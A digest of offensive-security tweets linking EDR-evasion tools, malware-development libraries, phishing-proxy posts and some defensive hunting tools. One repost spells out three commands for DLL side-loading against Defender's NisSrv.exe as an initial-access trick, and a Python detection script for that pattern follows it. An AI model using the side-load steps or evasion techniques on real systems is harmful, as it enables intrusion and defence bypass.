Offensive Xwitter
~$ socat TWITTER-LISTEN:443,fork,reuseaddr TELEGRAM:1.3.3.7:31337

Disclaimer: https://xn--r1a.website/OffensiveTwitter/546
😈 [ NinjaParanoid, Chetan Nayak (Brute Ratel C4) ]

Amongst all EDRs, SentinelOne applies the most userland hooks, not only in DLLs but also a few other places. So, I decided to make a brief video explaining its hooks & traps in memory, & how #BruteRatel evades it. Video contains light reversing and dev!!

https://t.co/WdS0z4PSyD

🔗 https://www.youtube.com/watch?v=qakZwswi5Jw

🐥 [ tweet ]
😈 [ ORCA10K, ORCA ]

Released a PoC on Perun's Fart by #sektor7, that patches ntdll with a new one read from a suspended process, thus unhooking your syscalls

https://t.co/y3LKQrwOJL

🔗 https://gitlab.com/ORCA000/perunsfart

🐥 [ tweet ]
😈 [ BlWasp_, BlackWasp ]

PAPAPA NEW PR!
My first PR on CrackMapExec: I have implemented the read and backup functions of the https://t.co/HQleAKcVrm Impacket script in an LDAP module for #CME with some improvements.
For the moment, the write functions are not possible.
https://t.co/NCdsjlsStA

🔗 https://github.com/Porchetta-Industries/CrackMapExec/pull/610

🐥 [ tweet ]
😈 [ HuskyHacksMK, Matt | HuskyHacks ]

🔬A new section has been added to PMAT and it's available for everyone!

I've added a new sample to teach simple x86 binary patching methodology.

📚Lesson: https://t.co/cIuqUKd4Fw

🦠Lab Repo: https://t.co/apbskSMBkY

🔗 https://notes.huskyhacks.dev/notes/on-patching-binaries
🔗 https://github.com/HuskyHacks/PMAT-labs/tree/main/labs/2-4.BinaryPatching/SimplePatchMe

🐥 [ tweet ]
😈 [ httpyxel, yxel ]

DeathSleep: A PoC implementation for an evasion technique to terminate the current thread and restore it before resuming execution, while implementing page protection changes during no execution.
https://t.co/rR7FnuVvA8

🔗 https://github.com/janoglezcampos/DeathSleep

🐥 [ tweet ]
😈 [ ShitSecure, S3cur3Th1sSh1t ]

Really like the “Malware Dev” posts from @0xPat, good read for everyone interested in that topic. Especially good for the basics 👌🔥

https://t.co/iRl72r4yz9

🔗 https://0xpat.github.io/

🐥 [ tweet ]
😈 [ podalirius_, Podalirius ]

[#thread 🧵] This weekend I wrote a #tool to scan for @TheApacheTomcat server #vulnerabilities in networks. I've always dreamed of being able to retrieve the list of computers in a #Windows #domain and scan for vulnerable #Apache #Tomcats automatically! 🎉

https://t.co/EOWfTbFCRh

🔗 https://github.com/p0dalirius/ApacheTomcatScanner/

🐥 [ tweet ]
😈 [ mariuszbit, mgeeky | Mariusz Banach ]

Can confirm - a nice DLL side-loading against Defender's executable.

Step 1:
copy "%ProgramFiles%\Windows Defender\NisSrv.exe" C:\Users\Public

Step 2:
g++ --shared -o C:\Users\Public\mpclient.dll proxy.cpp

Step 3:
"C:\Users\Public\NisSrv.exe"

Tasty Initial Access 🔥

🐥 [ tweet ][ quote ]
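A detection-side check for the procedure above, as an added example that is not from the quoted post: it parses image-load records in a simplified Sysmon Event ID 7 layout and flags a Defender binary running outside its install directory, and an unsigned DLL loaded from the same user-writable directory as the process that loaded it. EXPECTED_DIR and USER_WRITABLE_PREFIXES are assumptions, and the sample events are constructed, not captured telemetry.

```python
"""Hunt for the NisSrv.exe + mpclient.dll side-load pattern in image-load
telemetry. Added example, not code from the quoted post. The events below are
constructed in a simplified Sysmon Event ID 7 (Image loaded) layout:
'key=value' fields separated by ';'.
"""
from pathlib import PureWindowsPath

# Assumption: where these Microsoft binaries normally live (lower-cased).
EXPECTED_DIR = {
    "nissrv.exe": "c:\\program files\\windows defender",
    "msmpeng.exe": "c:\\program files\\windows defender",
}
# Heuristic: directories an unprivileged user can typically write to.
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")

SAMPLE_EVENTS = [  # constructed, not real telemetry
    "Image=C:\\Users\\Public\\NisSrv.exe;ImageLoaded=C:\\Users\\Public\\mpclient.dll;Signed=false;SignatureStatus=Unavailable",
    "Image=C:\\Program Files\\Windows Defender\\NisSrv.exe;ImageLoaded=C:\\Program Files\\Windows Defender\\mpclient.dll;Signed=true;Signature=Microsoft Windows",
    "Image=C:\\Users\\Public\\NisSrv.exe;ImageLoaded=C:\\Windows\\System32\\ntdll.dll;Signed=true;Signature=Microsoft Windows",
    "Image=C:\\Program Files\\SomeApp\\app.exe;ImageLoaded=C:\\Program Files\\SomeApp\\helper.dll;Signed=false;SignatureStatus=Unavailable",
]


def parse_event(line: str) -> dict:
    """Split one 'k=v;k=v' record into a dict."""
    rec = {}
    for field in line.split(";"):
        key, _, value = field.partition("=")
        rec[key.strip()] = value.strip()
    return rec


def analyse(rec: dict) -> list:
    """Return human-readable findings for one image-load record."""
    findings = []
    image = PureWindowsPath(rec["Image"])
    loaded = PureWindowsPath(rec["ImageLoaded"])
    img_dir, img_name = str(image.parent).lower(), image.name.lower()

    # Rule 1: a known Defender binary running outside its install directory.
    expected = EXPECTED_DIR.get(img_name)
    if expected and img_dir != expected:
        findings.append(f"relocated binary: {img_name} running from {img_dir} (expected {expected})")

    # Rule 2: unsigned DLL loaded from the process's own, user-writable directory.
    same_dir = str(loaded.parent).lower() == img_dir
    unsigned = rec.get("Signed", "false").lower() != "true"
    if same_dir and unsigned and img_dir.startswith(USER_WRITABLE_PREFIXES):
        findings.append(f"unsigned side-by-side DLL: {loaded.name} loaded by {img_name} from {img_dir}")
    return findings


def hunt(lines) -> dict:
    """Index of every event that produced findings -> its findings."""
    hits = {}
    for i, line in enumerate(lines):
        found = analyse(parse_event(line))
        if found:
            hits[i] = found
    return hits


if __name__ == "__main__":
    for i, found in hunt(SAMPLE_EVENTS).items():
        print(f"event {i}:")
        for item in found:
            print("  -", item)
```

Rule 1 fires on its own for the third event (the relocated NisSrv.exe loading the genuine ntdll.dll), so the hunt still catches the copy step even when the DLL load is legitimate, while the user-writable-directory condition in rule 2 keeps the fourth event (a vendor application loading its own unsigned helper from Program Files) out of the results. On a real host the same two rules can be run over Sysmon Event ID 7 or equivalent EDR module-load events.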
😈 [ ORCA10K, ORCA ]

decided to build libraries to help in malware development, so far I've only done a little, but here it is:
https://t.co/d0AfK2ypr0

🔗 https://github.com/MalwareApiLib/MalwareApiLibrary

🐥 [ tweet ]
😈 [ MDSecLabs, MDSec ]

"Fourteen Ways to Read the PID for the Local Security Authority Subsystem Service" - @modexpblog
presents some lesser known techniques for enumerating LSASS PIDs https://t.co/o7uzJpA0Iq

🔗 https://www.mdsec.co.uk/2022/08/fourteen-ways-to-read-the-pid-for-the-local-security-authority-subsystem-service-lsass/

🐥 [ tweet ]
😈 [ R0h1rr1m, Furkan Göksel ]

Another technique, Call Stack Spoofing, is in Nim right now! I developed the pure Nim version of the Call Stack Spoofing method thanks to @joehowwolf's PoC and blogpost. You can find the repository below.

https://t.co/R7y34dQaYu

🔗 https://github.com/frkngksl/NimicStack

🐥 [ tweet ]
👹 [ snovvcrash, sn🥶vvcr💥sh ]

[#HackTip] Such a tiny code snippet that can help you bypass some automatic sandbox detections

#maldev

🐥 [ tweet ]
😈 [ SemperisTech, Semperis ]

Privilege escalation is a prime tool for attackers to infiltrate your #ActiveDirectory, and from there, anything they want. Learn more about a vulnerability that can enable #cyberattackers to target AD Certificate Services and take over your domain. https://t.co/rwUp9tIiAn

🔗 https://www.semperis.com/blog/ad-vulnerability-cve-2022-26923/

🐥 [ tweet ]
😈 [ s4ntiago_p, S4ntiagoP ]

A small blogpost (and PoC) about creating Windows processes using syscalls 😊
https://t.co/P5isRGOnN7

🔗 https://www.coresecurity.com/core-labs/articles/creating-processes-using-system-calls

🐥 [ tweet ]
😈 [ _RastaMouse, Rasta Mouse ]

[BLOG]
Fun post on how to combine evilginx by @mrgretzky and BITB by @mrd0x.

https://t.co/8gShYwEyPY

🔗 https://rastamouse.me/evilginx-meet-bitb/

🐥 [ tweet ]
😈 [ last0x00, last ]

After a few weeks of development, I'm happy to share my new work: PersistenceSniper. It is a #Powershell module that allows #BlueTeams, #IncidentResponders and #Sysadmins to hunt for persistence implanted in their Windows machines. Check it out!

https://t.co/oma0h8gFfF

🔗 https://github.com/last-byte/PersistenceSniper/

🐥 [ tweet ]
😈 [ praetorianlabs, Praetorian ]

Anatomy of an automotive security assessment that helps protect life and limb

https://t.co/cg7pAq5Luz

#automotivesecurity #carhacking

🔗 https://www.praetorian.com/blog/automotive-security-assessment-anatomy/

🐥 [ tweet ]